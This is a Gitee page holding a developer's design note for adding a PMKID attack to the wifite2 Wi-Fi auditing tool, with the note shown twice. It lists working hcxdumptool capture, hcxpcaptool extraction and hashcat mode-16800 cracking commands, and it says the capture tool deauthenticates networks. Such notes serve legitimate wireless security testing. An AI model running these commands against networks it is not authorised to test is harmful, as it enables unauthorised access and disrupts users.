PMKID.md · x浪客v剑心s/wifite2 - Gitee.com

加入 Gitee

与超过 1200万开发者一起发现、参与优秀开源项目，私有仓库也完全免费：）

克隆/下载

PMKID.md 1.31 KB

### PMKID Attack

See https://hashcat.net/forum/thread-7717.html

### Steps

1. Start `hcxdumptool` (daemon)
   * `sudo hcxdumptool -i wlan1mon -o pmkid.pcapng -t 10 --enable_status=1`
   * Should also use `-c <channel>`, `--filterlist` and `--filtermode` to target a specific client
   * Could be a new attack type: `wifite.attack.pmkid`
2. Detect when PMKID is found.
   * `hcxpcaptool -z pmkid.16800 pmkid.pcapng`
   * Single-line in pmkid.16800 will have PMKID, MACAP, MACStation, ESSID (in hex).
3. Save `.16800` file (to `./hs/`? or `./pmkids/`?)
   * New result type: `pmkid_result`
   * Add entry to `cracked.txt`
4. Run crack attack using hashcat:
   * `./hashcat64.bin --force -m 16800 -a0 -w2 path/to/pmkid.16800 path/to/wordlist.txt`

### Problems

* Requires latest hashcat to be installed. This might be in a different directory.
   * Use can specify path to hashcat? Yeck...
   * % hashcat -h | grep 16800
   * 16800 | WPA-PMKID-PBKDF2
* If target can't be attacked... we need to detect this failure mode.
   * Might need to scrape `hcxdumptool`'s output
   * Look at `pmkids()` func in .bashrc
   * hcxpcaptool -z OUTPUT.16800 INPUT.pcapng > /dev/null
   * Check OUTPUT.16800 for the ESSID.
* Wireless adapter support is minimal, apparently.
* hcxdumptool also deauths networks and captures handshakes... maybe unnecessarily

一键复制编辑原始数据按行查看历史

提交于 2018-08-15 11:08 . Added PMKID attack. Simplified attack-loop.

PMKID Attack

See https://hashcat.net/forum/thread-7717.html

Steps

Start hcxdumptool (daemon)
- sudo hcxdumptool -i wlan1mon -o pmkid.pcapng -t 10 --enable_status=1
- Should also use -c <channel>, --filterlist and --filtermode to target a specific client
- Could be a new attack type: wifite.attack.pmkid
Detect when PMKID is found.
- hcxpcaptool -z pmkid.16800 pmkid.pcapng
- Single-line in pmkid.16800 will have PMKID, MACAP, MACStation, ESSID (in hex).
Save .16800 file (to ./hs/? or ./pmkids/?)
- New result type: pmkid_result
- Add entry to cracked.txt
Run crack attack using hashcat:
- ./hashcat64.bin --force -m 16800 -a0 -w2 path/to/pmkid.16800 path/to/wordlist.txt

Problems

Requires latest hashcat to be installed. This might be in a different directory.
- Use can specify path to hashcat? Yeck...
- % hashcat -h | grep 16800
- 16800 | WPA-PMKID-PBKDF2
If target can't be attacked... we need to detect this failure mode.
- Might need to scrape hcxdumptool's output
- Look at pmkids() func in .bashrc
- hcxpcaptool -z OUTPUT.16800 INPUT.pcapng > /dev/null
- Check OUTPUT.16800 for the ESSID.
Wireless adapter support is minimal, apparently.
hcxdumptool also deauths networks and captures handshakes... maybe unnecessarily

1

https://gitee.com/iq84/wifite2.git

git@gitee.com:iq84/wifite2.git

iq84

wifite2

wifite2

master